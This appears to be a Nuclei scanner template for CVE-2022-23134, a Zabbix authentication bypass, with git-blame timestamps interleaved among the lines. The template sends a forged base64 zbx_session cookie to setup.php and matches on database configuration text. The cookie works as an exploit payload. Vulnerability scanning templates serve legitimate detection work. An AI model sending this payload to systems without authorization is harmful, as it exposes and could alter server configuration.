2022-02-25 16:00:40 +00:00
id : CVE-2022-23134
info :
2022-03-08 17:35:20 +00:00
name : Zabbix Setup Configuration Authentication Bypass
2022-02-25 16:00:40 +00:00
author : bananabr
severity : medium
2022-05-17 09:18:12 +00:00
description : After the initial setup process, some steps of setup.php file are reachable not only by super-administrators but also by unauthenticated users. A malicious actor can pass step checks and potentially change the configuration of Zabbix Frontend.
2022-02-25 16:00:40 +00:00
reference :
- https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storage
- https://nvd.nist.gov/vuln/detail/CVE-2022-23134
2022-05-17 09:18:12 +00:00
- https://support.zabbix.com/browse/ZBX-20384
- https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6SZYHXINBKCY42ITFSNCYE7KCSF33VRA/
2022-02-25 16:00:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
cvss-score : 5.3
cve-id : CVE-2022-23134
2023-04-12 10:55:48 +00:00
epss-score : 0.33652
2022-07-21 17:18:22 +00:00
tags : cve,cve2022,zabbix,auth-bypass,kev
2023-04-28 08:11:21 +00:00
metadata :
max-request : 2
2022-02-25 16:00:40 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-02-25 16:00:40 +00:00
- method : GET
path :
- "{{BaseURL}}/zabbix/setup.php"
- "{{BaseURL}}/setup.php"
2022-02-25 18:30:48 +00:00
2022-02-25 16:00:40 +00:00
headers :
Cookie : "zbx_session=eyJzZXNzaW9uaWQiOiJJTlZBTElEIiwiY2hlY2tfZmllbGRzX3Jlc3VsdCI6dHJ1ZSwic3RlcCI6Niwic2VydmVyQ2hlY2tSZXN1bHQiOnRydWUsInNlcnZlckNoZWNrVGltZSI6MTY0NTEyMzcwNCwic2lnbiI6IklOVkFMSUQifQ%3D%3D"
2022-02-25 18:30:48 +00:00
stop-at-first-match : true
2022-02-25 16:00:40 +00:00
matchers-condition : and
matchers :
- type : word
words :
- "Database"
- "host"
- "port"
2022-02-25 18:30:48 +00:00
- "Zabbix"
2022-02-25 16:00:40 +00:00
condition : and
2022-02-25 18:30:48 +00:00
2022-02-25 16:00:40 +00:00
- type : status
status :
2022-03-08 15:36:27 +00:00
- 200
# Enhanced by mp on 2022/03/08